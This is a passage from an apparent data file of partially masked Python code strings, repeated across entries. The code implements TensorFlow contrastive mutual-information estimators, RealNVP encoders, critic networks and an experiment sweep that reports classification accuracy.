training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
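Downstream quality in these rows is measured by logistic_fit, a linear probe on the learned codes. A minimal sketch of that evaluation with toy random features (scikit-learn assumed available; the multinomial option from the quoted call is omitted here for brevity):

# Hedged sketch: linear-probe evaluation of learned representations.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import MinMaxScaler

def logistic_fit(x_train, y_train, x_test, y_test):
    # Min-max scale the representations, then score a logistic-regression probe.
    scaler = MinMaxScaler()
    x_train = scaler.fit_transform(x_train)
    x_test = scaler.transform(x_test)
    clf = LogisticRegression(solver='saga', tol=0.1, C=10.0)
    clf.fit(x_train, y_train.ravel())
    return clf.score(x_test, y_test.ravel())

rng = np.random.RandomState(0)
x_tr, y_tr = rng.randn(200, 16), rng.randint(0, 10, size=200)  # toy stand-in codes
x_te, y_te = rng.randn(50, 16), rng.randint(0, 10, size=50)
print(logistic_fit(x_tr, y_tr, x_te, y_te))  # roughly chance accuracy on random data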
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment 
token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = 
tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, 
hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
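This entry keeps `label_smooth_pcc`, which scores an n-by-n critic matrix against a smoothed identity-label matrix. A minimal NumPy sketch of that smoothing step follows, added for illustration only; the `smoothing` value of 0.1 is an assumed placeholder for `args.smoothing`, and the score matrix is synthetic.

import numpy as np

def label_smooth_bce(scores, smoothing=0.1):
    # Positives sit on the diagonal; smoothing pulls hard 0/1 labels toward 0.5
    # before the binary cross-entropy, mirroring the embedded label_smooth_pcc.
    n = scores.shape[0]
    labels = np.eye(n).reshape(-1)
    labels = (1.0 - smoothing) * labels + smoothing / 2.0
    probs = 1.0 / (1.0 + np.exp(-scores.reshape(-1)))  # sigmoid of critic scores
    eps = 1e-7
    return -np.mean(labels * np.log(probs + eps)
                    + (1.0 - labels) * np.log(1.0 - probs + eps))

scores = np.random.default_rng(1).normal(size=(8, 8))  # synthetic example
print(label_smooth_bce(scores))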
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
